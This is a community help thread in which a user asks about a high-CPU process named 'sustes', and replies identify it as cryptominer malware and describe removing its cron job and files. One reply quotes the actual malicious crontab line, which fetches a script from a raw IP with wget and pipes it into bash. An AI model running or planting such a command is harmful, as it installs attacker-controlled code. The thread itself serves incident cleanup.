Question

What is this "sustes" in my process in my CPU stats?

Under CPU Processes I have one thread running high at 54.50 % I have no clue what does it mean…

Subscribe
Share

Submit an answer
You can type!ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!

These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.

This is a cryptominer malware. You must delete it from your droplets. First delete this cron job. It runs under user, which called process “sustes”. You can find this username with “top” or in output of this comand: ps aux | grep sustes

Then look at cron job of this user: crontab -u username -l If it has this string

then edit this crobjob crontab -e -u username

or delete at all by crontab -r -u username

Then delete these files /var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123

We also had the same problem, we were using activemq 5.9 which we suspected might have the vulnerability because after we updated it to latest, the process didn’t started automatically. We observed on every friday, test server had this process automatically running.

We’ve found a similar script/process. Turned out our test server had been compromised and its actually been mining crypto currency.

Check the crontab file for the following:

* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

Edit: not sure if I should remove the IP address

Hello friend!

I’m afraid I have not heard of a process that identifies itself by that name, but that would generally be true of many applications that I have not personally used so it does not necessarily mean that anything is working other than in the intended way.

The short version of what this means is that software on your server is utilizing the CPU, and under an ideal scenario you would know what that software was in relation to how you set up the server and what that server’s role is.

Going a bit deeper, I would SSH in and run “top” and then press C to reveal more about the process, particularly under the Command column. You should be able to see in more detail where it is being ran from and what user on the system is running it. From there your path is a bit more of an unwritten story, as what you do next depends heavily on what you want to do and whether or not that is something that should be running on your system.

Kind Regards, Jarland